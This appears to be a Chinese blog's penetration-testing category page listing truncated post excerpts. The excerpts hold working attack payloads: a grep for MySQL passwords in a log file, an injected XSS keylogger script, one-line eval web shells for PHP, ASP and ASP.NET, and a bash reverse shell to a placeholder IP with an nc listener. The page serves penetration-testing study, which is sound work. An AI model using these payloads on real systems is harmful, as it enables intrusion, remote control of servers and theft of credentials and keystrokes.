路漫漫其修远兮
随笔分类 - 渗透测试
摘要:grep "password" /var/log/mysqld.log
阅读全文
摘要:xss键盘记录 xss插入代码 <script type="text/javascript" src="./log.js"></script> log.js document.onkeypress=function(evt){ evt=evt ? evt : window.event; key=St
阅读全文
摘要:一句话木马 PHP:<?php @eval ($_POST['pass']);?> ASP:<%eval request("pass")%> ASP.NET:<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 客户端绕
阅读全文
摘要:Linux中的常见反弹shell 方法一:利用Linux命令 #靶机反弹命令 bash -i >/dev/tcp/x.x.x.x/23333 0>&1 2>&1 #攻击机开始监听 nc -lvp 23333 在系统文件中是不存在/dev/tcp这个文件的,它是一个特殊文件,打开这个文件就类似于发出了
阅读全文
